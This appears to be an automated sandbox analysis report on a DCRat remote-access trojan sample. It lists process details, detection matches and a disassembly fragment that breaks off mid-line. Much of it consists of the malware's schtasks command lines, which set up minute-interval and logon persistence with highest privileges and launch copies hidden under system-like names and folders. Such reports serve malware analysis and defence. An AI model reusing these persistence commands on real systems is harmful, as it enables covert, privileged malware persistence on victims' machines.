                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:12:07:05
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\ProgramData\ssh\System.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\\ProgramData\ssh\System.exe"
                                                                                            Imagebase:0xcf0000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1800682479.000000000329F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1800682479.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1803403382.000000001306D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 81%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 10 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 8 /tr "'C:\Users\Default\AppData\Roaming\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:15
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:16
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\msbuild\Microsoft\Windows Workflow Foundation\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:17
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:18
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:19
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:20
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Recovery\Idle.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:21
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:22
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\Recovery\Idle.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:23
                                                                                            Start time:12:07:07
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:24
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:25
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Recovery\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:26
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 9 /tr "'C:\Recovery\upfc.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:27
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:28
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 14 /tr "'C:\Recovery\upfc.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:29
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 12 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:30
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Recovery\Idle.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Recovery\Idle.exe
                                                                                            Imagebase:0x230000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.4123458318.0000000002591000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001E.00000002.4123458318.0000000002689000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 100%, Avira
                                                                                            • Detection: 100%, Joe Sandbox ML
                                                                                            • Detection: 81%, ReversingLabs
                                                                                            Has exited:false

                                                                                            Target ID:31
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFns" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:32
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 6 /tr "'C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:33
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Recovery\Idle.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Recovery\Idle.exe
                                                                                            Imagebase:0x50000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000021.00000002.1896236954.0000000002401000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:34
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
                                                                                            Imagebase:0x2c0000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.1886936604.0000000002681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000022.00000002.1886936604.00000000026BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Antivirus matches:
                                                                                            • Detection: 81%, ReversingLabs
                                                                                            Has exited:true

                                                                                            Target ID:35
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:36
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\lmXqPxTfNHomnnafzTOKZnFns.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'870'848 bytes
                                                                                            MD5 hash:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.1893402647.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000024.00000002.1893402647.000000000281D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Has exited:true

                                                                                            Target ID:37
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:38
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\LiveKernelReports\WinStore.App.exe'" /rl HIGHEST /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Target ID:41
                                                                                            Start time:12:07:08
                                                                                            Start date:11/01/2025
                                                                                            Path:C:\Windows\System32\schtasks.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:schtasks.exe /create /tn "lmXqPxTfNHomnnafzTOKZnFnsl" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows sidebar\lmXqPxTfNHomnnafzTOKZnFns.exe'" /f
                                                                                            Imagebase:0x7ff76f990000
                                                                                            File size:235'008 bytes
                                                                                            MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true


                                                                                              Execution Graph

                                                                                              Execution Coverage:9.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:9.3%
                                                                                              Total number of Nodes:1501
                                                                                              Total number of Limit Nodes:26
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 23985 10aee0 23986 10aeea __EH_prolog 23985->23986 24148 f130b 23986->24148 23989 10b5cb 24213 10cd2e 23989->24213 23990 10af2c 23993 10afa2 23990->23993 23994 10af39 23990->23994 24055 10af18 23990->24055 23997 10b041 GetDlgItemTextW 23993->23997 24003 10afbc 23993->24003 23998 10af75 23994->23998 23999 10af3e 23994->23999 23995 10b5f7 24001 10b600 SendDlgItemMessageW 23995->24001 24002 10b611 GetDlgItem SendMessageW 23995->24002 23996 10b5e9 SendMessageW 23996->23995 23997->23998 24000 10b077 23997->24000 24004 10af96 KiUserCallbackDispatcher 23998->24004 23998->24055 24008 fddd1 53 API calls 23999->24008 23999->24055 24005 10b08f GetDlgItem 24000->24005 24145 10b080 24000->24145 24001->24002 24231 109da4 GetCurrentDirectoryW 24002->24231 24007 fddd1 53 API calls 24003->24007 24004->24055 24010 10b0a4 SendMessageW SendMessageW 24005->24010 24011 10b0c5 SetFocus 24005->24011 24012 10afde SetDlgItemTextW 24007->24012 24013 10af58 24008->24013 24009 10b641 GetDlgItem 24015 10b664 SetWindowTextW 24009->24015 24016 10b65e 24009->24016 24010->24011 24017 10b0d5 24011->24017 24028 10b0ed 24011->24028 24018 10afec 24012->24018 24253 f1241 SHGetMalloc 24013->24253 24232 10a2c7 GetClassNameW 24015->24232 24016->24015 24022 fddd1 53 API calls 24017->24022 24026 10aff9 GetMessageW 24018->24026 24018->24055 24019 10af5f 24023 10af63 SetDlgItemTextW 24019->24023 24019->24055 24020 10b56b 24024 fddd1 53 API calls 24020->24024 24027 10b0df 24022->24027 24023->24055 24029 10b57b SetDlgItemTextW 24024->24029 24031 10b010 IsDialogMessageW 24026->24031 24026->24055 24254 10cb5a 24027->24254 24036 fddd1 53 API calls 24028->24036 24033 10b58f 24029->24033 24031->24018 24035 10b01f TranslateMessage DispatchMessageW 24031->24035 24039 fddd1 53 API calls 24033->24039 24035->24018 24038 10b124 24036->24038 24037 10b6af 24041 10b6df 24037->24041 24046 fddd1 53 API calls 24037->24046 24042 f400a _swprintf 51 API calls 24038->24042 24043 
